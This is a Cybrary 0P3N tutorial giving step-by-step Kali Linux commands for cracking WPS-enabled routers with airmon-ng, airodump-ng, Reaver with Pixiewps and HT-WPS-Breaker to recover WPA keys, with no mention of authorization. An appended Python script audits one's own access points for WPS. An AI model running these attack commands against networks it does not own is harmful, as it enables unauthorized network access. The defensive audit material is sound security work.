This Cybrary 0P3N submission covers how to use tools such as the aircrack-ng suite, Reaver, Pixiewps, and HT-WPS#B to exploit a WPS vulnerability in certain routers. The attack is carried out on a machine running Kali Linux. (Kali comes pre-packaged with the mentioned tools aside from HT-WPS#B.)
Here is a list of vulnerable routers: Spreadsheet of Routers Vulnerable to WPS Exploit
To start, open a terminal as root and run the following commands.
apt-get install reaver aircrack-ng
Once you have run the above command, we will use airmon-ng to set our wireless card into monitor mode. (You must have a wireless card capable of packet injection.)
First we will check for any interfering processes by using the following command.
If processes were found, use the following command to kill them.
airmon-ng check kill
Now to set the card to monitor mode.
airmon-ng start wlan0
Next we will use airodump-ng to scan for wireless access points with WPS enabled.
airodump-ng wlan0mon --wps
Once airodump has found the AP you are attacking, press Ctrl+C to stop, then copy down the BSSID and channel number.
Our next step is to use Reaver combined with Pixiewps mode to exploit the target AP.
reaver -i wlan0mon -c# -b XX:XX:XX:XX:XX:XX -k 1
-i specifies the interface used.
-c specifies the channel of the AP. Replace # with the channel number.
-b specifies the BSSID of the AP. Replace XX:XX:XX:XX:XX:XX with the BSSID you copied down.
You can also time the reaver process by using the following command.
time reaver -i wlan0mon -c# -b XX:XX:XX:XX:XX:XX -k 1
If successful, the WPS pin will be passed to reaver and the WPA key will be discovered. Once you have followed the above steps and are comfortable with the process, I suggest using HT-WPS#B to automate the entire process.
Using HT-WPS-Breaker to automate the process
To install, CLICK HERE, then drag the .zip to your desktop and run the following commands.
- cd Desktop
- unzip HT-WPS-Breaker-master.zip
- cd HT-WPS-Breaker-master
- chmod +x HT-WB.sh
- ./HT-WB.sh or bash HT-WB.sh
This concludes a simple write-up of how to use Reaver and other tools to attack a WPS-enabled AP. I have had many questions on how to use Reaver so I hope this helps. Comment below if you have any questions. (Please keep comments in regards to the topic.)
~Evox
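From the defender's side, the WPS advertisement that the scanning step above looks for can be used to audit your own access points. The following is an added example, not part of the original write-up: it parses scan text in the layout printed by `iw dev <iface> scan` and reports which BSSIDs from your own inventory still advertise WPS. The sample scan, the BSSIDs and the audit_wps function name are constructed for illustration.

```python
import re

# Constructed sample modeled on `iw dev <iface> scan` output; all values are made up.
SAMPLE_SCAN = """\
BSS 02:00:00:aa:bb:01(on wlan0)
\tSSID: office-main
\tWPS:\t * Version: 1.0
\t\t * Wi-Fi Protected Setup State: 2 (Configured)
\t\t * AP setup locked: 0x01
BSS 02:00:00:aa:bb:02(on wlan0)
\tSSID: office-guest
\tWPS:\t * Version: 1.0
BSS 02:00:00:aa:bb:03(on wlan0)
\tSSID: office-5g
BSS 02:00:00:cc:dd:99(on wlan0)
\tSSID: not-ours
\tWPS:\t * Version: 1.0
"""
# Hypothetical inventory of BSSIDs you administer; anything else is ignored.
OWNED_BSSIDS = {"02:00:00:aa:bb:01", "02:00:00:aa:bb:02", "02:00:00:aa:bb:03"}
BSS_RE = re.compile(r"^BSS ([0-9a-f]{2}(?::[0-9a-f]{2}){5})", re.I)

def audit_wps(scan_text, owned):
    """Return (bssid, ssid, action) for each owned AP that advertises WPS."""
    aps, cur = {}, None
    for line in scan_text.splitlines():
        field = line.strip()
        m = BSS_RE.match(line)
        if m:  # start of a new AP record
            cur = aps[m.group(1).lower()] = {"ssid": "", "wps": False, "locked": False}
        elif cur is None:
            continue
        elif field.startswith("SSID:"):
            cur["ssid"] = field[5:].strip()
        elif field.startswith("WPS:"):  # WPS information element present in beacon
            cur["wps"] = True
        elif field.startswith("* AP setup locked:"):
            cur["locked"] = int(field.rsplit(":", 1)[1], 16) != 0
    findings = []
    for bssid in sorted(b.lower() for b in owned):
        ap = aps.get(bssid)
        if ap and ap["wps"]:
            # A set lock flag does not mean WPS is off, so the AP is still reported.
            findings.append((bssid, ap["ssid"], "verify-config" if ap["locked"] else "disable-wps"))
    return findings

if __name__ == "__main__":
    for bssid, ssid, action in audit_wps(SAMPLE_SCAN, OWNED_BSSIDS):
        print(f"{bssid} ({ssid}): WPS advertised -> {action}")
```

Any AP reported with disable-wps should have WPS turned off in its configuration and then be rescanned to confirm the WPS element is gone from its beacons.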